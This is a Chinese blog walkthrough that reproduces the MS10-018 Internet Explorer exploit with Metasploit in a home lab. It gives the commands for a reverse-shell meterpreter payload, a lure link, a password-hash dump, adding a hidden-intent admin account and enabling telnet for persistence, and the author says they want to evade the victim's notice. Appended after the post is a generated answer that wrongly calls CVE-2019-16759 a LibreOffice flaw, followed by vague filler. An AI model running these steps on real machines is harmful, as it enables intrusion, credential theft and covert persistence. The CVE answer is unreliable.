MS10-018漏洞复现详解

漏洞介绍

MS10-018是IE浏览器上的漏洞,主要危害Internet Explorer 6和Internet Explorer 7,有人说对IE8也有危害,也有人说最新的IE8没有影响,且有实验表明在IE8上没有渗透攻击成功。
攻击者可以通过该漏洞获取受害主机的控制权。

漏洞预防

更新IE浏览器到安全版本以上
不要乱点击未知的网页链接
确保自己的电脑防火请随时开着等等

漏洞复现过程

漏洞环境

靶机:Windows xp sp2(sp3也可以,主要看IE版本)IP:192.168.231.34
我的另一偏文章里提供有sp2下载:sp2下载安装
攻击机:kali 2022.1版本 IP:192.168.231.124
kali下载地址:
链接: https://www.kali.org/get-kali/#kali-installer-images

复现过程

查看受害主机IE浏览器的版本,在符合要求内。我的是英文版的,打开浏览器后,选择“help”,再点击“about Internet Explorer”查看浏览器版本信息。
在这里插入图片描述
浏览器的版本符合漏洞所需环境。为6.0版本。
在这里插入图片描述现在查看靶机的IP为:192.168.231.34,ping一下攻击机,可以ping得通。
在这里插入图片描述
现在查看一下攻击机IP,为192.168.231.124,ping一下靶机,可以ping成功。
在这里插入图片描述两台机器之间可以互相ping通,现在开始实验。
用命令msfconsole -q打开msf命令行,-q可以不显示msf的logo,当然也可以不使用-q。
search ms10-018命令查看可利用模块,这里使用第一个。
在这里插入图片描述现在在选择模块之前,先设置这样一个payload:set payload windows/meterpreter/reverse_tcp。
下面的SRVHOST的意思是服务器IP地址,也就是接下来监控靶机浏览器流量的服务器地址。这里我们设置为攻击机的IP地址。
LHOST的意思即时攻击机IP地址,即:192.168.231.124。
在这里插入图片描述现在把SRVHOST和LHOST设置好了后再show options一次看到刚才没有IP的地方加上去了。
在这里插入图片描述在开始攻击之前,先给即将生成的链接设置一个富含诱惑力的名字,命令:set uripath XXXXX。
exploit发起攻击后形成一个链接:http://192.168.231.124:8080/The_girls_you_wanted。
在这的下一行可以看到服务已经启动,,,现在要做的就是等待一个其电脑浏览器存在这个漏洞的受害者打开这个链接。。。。
在这里插入图片描述现在假设我就是那个傻逼,在某个地方或网站看到这个链接,觉得对我充满了诱惑力,很想看看里面是啥东西,然后我就直接访问了这个链接,而我的IE浏览器正好存在这个漏洞,发现访问不了,且我的浏览器出现了闪退的情况。。。。。。
在这里插入图片描述然后现在在攻击机这边,可以看到完全可以接收到关于靶机的系统信息。
在这里插入图片描述现在使用命令sessions -l 可以看到里面有三个攻击链接反弹会话回来了,前两个是刚才我做的。现在的是第三个。
在这里插入图片描述sessions -i 3 命令选择第三个会话后,直接shell到靶机cmd命令行,现在相当于在靶机cmd命令行进行操作。
在这里插入图片描述在meterpreter交互模式这里,可以使用sysinfo命令查看靶机信息,也可以help或者?查看meterpreter交互模式里的命令使用。。。
在这里插入图片描述
使用命令hashdump可以把靶机hash值dump下来,经过破解得到用户名和密码。但这并不是主要目的,我们的目的是要Irrecoverable damage to the system
在这里插入图片描述现在shell到靶机cmd命令行,使用命令:net user hacker 123 /add 创建一个用户,并将其添加到管理员组里面去。
在这里插入图片描述把hacker用户成功添加到管理员组了。
现在使用命令sc config tlntsvr start=auto,使其telnet服务在下次开机时自动启动,但是由于靶机没有关机再启动,所以直接使用命令sc start tlntsvr 开启telnet服务。
在这里插入图片描述开启telnet服务后,再在kali打开一个终端,使用telnet 192.168.231.34连接到靶机去,执行成功。
在这里插入图片描述可以看到现在重新开机靶机,会有两个登录账号了。其中hacker就是刚才实验创建的那个。
在这里插入图片描述但是这种方式不是很安全,因为如果另一个人也正在登,就可以直接看到用户列表多了个奇怪的账户名,所以最好是把账号隐藏起来,但是这一块还没会啃,希望有会的大佬可以分享一下。。。。。然后还有一种是通过在kali端开启远程桌面连接功能,然后通过远程桌面连接靶机,但是我的靶机好像不行,不知道哪里除了问题,远程桌面一直连接不了。但其实远程桌面连接这种也不安全,因为远程桌面一个用户登录就意味着原来正在登录的用户就会被迫下线,所以还是要想办法做到让受害主机不会发现。
这就是MS10-018漏洞的大概复原过程,有不对的地方恭请各位大佬指正,小弟感谢。。。。

小结:

MS10-018漏洞其实不是争对哪个哪个主机发起的攻击,它其实是类似于一种钓鱼手段,就是哪个小可爱对那个链接感兴趣,而他的浏览器版本刚好又符合该漏洞所需的条件,那么才会被攻击。

文章部分内容参考于:https://edu.51cto.com/center/course/lesson/index?id=62485

  • 3
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: 这个问题我可以回答。CVE-2019-16759漏洞是LibreOffice软件中的一个漏洞,攻击者可以利用该漏洞通过特制的ODF文档文件来执行任意代码。该漏洞的原理是由于LibreOffice在处理ODF文档时,没有正确地验证文档中的宏代码,导致攻击者可以通过恶意代码来执行任意命令。该漏洞已经被修,建议用户及时更新软件版本。 ### 回答2: CVE-2019-16759是一个存在于某个软件或系统中的安全漏洞。该漏洞具体的原理是指某个软件或系统的设计或实过程中存在的缺陷,使得攻击者可以利用这个缺陷来执行恶意操作。 对于CVE-2019-16759漏洞而言,具体的原理可以分为以下几个方面进行解析。 首先,CVE-2019-16759漏洞可能涉及到软件或系统中的某个输入验证机制存在问题。在正常的运行过程中,软件或系统需要接受用户的输入,并对输入进行验证,以确保输入的合法性。然而,由于软件或系统在输入验证方面存在缺陷,攻击者可以发送恶意输入来绕过验证过程,从而导致安全漏洞的产生。 其次,CVE-2019-16759漏洞可能与某个安全控制机制的问题有关。安全控制机制是指软件或系统中用于限制用户权限和保护敏感数据的一系列规则和方法。然而,由于软件或系统在安全控制方面存在漏洞,攻击者可以绕过控制机制,获取未经授权的访问权限或窃取敏感数据。 第三,CVE-2019-16759漏洞可能涉及到软件或系统中的某个错误处理机制存在问题。在软件或系统的运行过程中,会出各种错误和异常情况,需要有相应的处理机制来处理这些问题。然而,由于软件或系统在错误处理方面存在缺陷,攻击者可以利用这些错误和异常情况来执行恶意操作,进而导致安全漏洞的产生。 总之,CVE-2019-16759漏洞的原理可以归结为输入验证机制的问题、安全控制机制的问题和错误处理机制的问题等方面。攻击者可以利用这些缺陷来绕过验证、获取未经授权的权限或窃取敏感数据,从而导致软件或系统的安全性受到威胁。为了解决该漏洞,开发者或维护者需要修相关的软件或系统,增强输入验证、安全控制和错误处理等方面的能力,确保软件或系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值